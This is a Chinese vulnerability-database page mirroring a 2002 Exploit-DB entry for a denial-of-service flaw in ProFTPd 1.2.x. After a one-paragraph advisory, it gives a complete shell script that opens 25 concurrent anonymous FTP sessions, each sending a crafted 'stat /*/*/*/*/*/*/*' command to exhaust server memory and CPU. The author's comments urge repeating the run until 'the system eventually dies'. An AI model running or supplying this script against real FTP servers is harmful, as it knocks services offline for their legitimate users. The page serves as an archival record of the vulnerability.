ProFTPd 1.2.x – ‘STAT’ Denial of Service

ProFTPd 1.2.x – ‘STAT’ Denial of Service

漏洞ID 1053658 漏洞类型
发布时间 2002-12-09 更新时间 2002-12-09
图片[1]-ProFTPd 1.2.x – ‘STAT’ Denial of Service-安全小百科CVE编号 N/A
图片[2]-ProFTPd 1.2.x – ‘STAT’ Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22079
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6341/info

A denial of service vulnerability has been reported for ProFTPD. It is possible to cause ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will result in a denial of service condition.

#!/bin/sh
#
# proftpd <=1.2.7rc3 DoS - Requires anonymous/ftp login at least
# might work against many other FTP daemons
# consumes nearly all memory and alot of CPU
#
# tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3
#
# 7-dec-02 - detach  -  www.duho.org
#
# use: ./prodos.sh <host> <user> <pass>
# do this some more to make sure the system eventually dies

cnt=25
while [ $cnt -gt 0 ] ; do
ftp -n << EOF&
o $1
quote user $2
quote pass $3
quote stat /*/*/*/*/*/*/*
quit
EOF
let cnt=cnt-1
done
sleep 2
killall -9 ftp
echo DONE!

#end

相关推荐: Meunity Script Injection Vulnerability

Meunity Script Injection Vulnerability 漏洞ID 1101381 漏洞类型 Input Validation Error 发布时间 2002-10-14 更新时间 2002-10-14 CVE编号 N/A CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享